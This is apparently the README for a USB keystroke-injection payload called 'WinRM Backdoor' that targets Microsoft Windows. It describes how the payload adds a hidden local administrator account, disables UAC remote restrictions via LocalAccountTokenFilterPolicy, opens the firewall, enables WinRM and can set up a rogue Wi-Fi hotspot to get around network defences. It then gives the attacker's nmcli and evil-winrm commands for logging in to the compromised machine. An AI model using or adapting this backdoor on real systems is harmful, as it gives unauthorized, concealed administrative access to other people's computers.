- Title: "Microsoft Windows" WinRM Backdoor
- Author: TW-D
- Version: 1.0
- Target: Microsoft Windows
- Category: Remote Access
- Adds a user account.
- Adds this local user to local administrator group.
- If the target computer is equipped with a compatible Wi-Fi card : Avoids security measures on the internal network with the creation of a wireless "Hosted Network".
- Enables "Windows Remote Management" with default settings.
- Adds a rule to the firewall.
- Sets a value to "LocalAccountTokenFilterPolicy" to disable "UAC" remote restrictions.
- Hides user account.
From "payload.txt" change the values of the following constants :
######## INITIALIZATION ########
readonly WINDOWS_USERNAME="BB_User"
readonly WINDOWS_PASSWORD="BB_P@ssW0rD"
##
# (any) Administrators
# (fr) Administrateurs
##
readonly GROUP_NAME="Administrators"
##
# Can be set to "true" if the target computer
# is equipped with a compatible Wi-Fi card.
##
readonly WIRELESS_HOTSPOT="false"
readonly HOTSPOT_NAME="BB_HOTSPOT"
The name of the access point and the security key will be those defined by the values of the constants : HOTSPOT_NAME and WINDOWS_PASSWORD.
hacker@hacker-computer:~$ nmcli dev wifi connect "<HOTSPOT_NAME>" password "<WINDOWS_PASSWORD>"
The connection identifiers will be those defined by the values of the constants : WINDOWS_USERNAME and WINDOWS_PASSWORD.
hacker@hacker-computer:~$ evil-winrm --ip <TARGET> --user <WINDOWS_USERNAME> --password '<WINDOWS_PASSWORD>'
*Evil-WinRM* PS C:\Users\<WINDOWS_USERNAME>\Documents> whoami
desktop-xxxxxxx\<WINDOWS_USERNAME>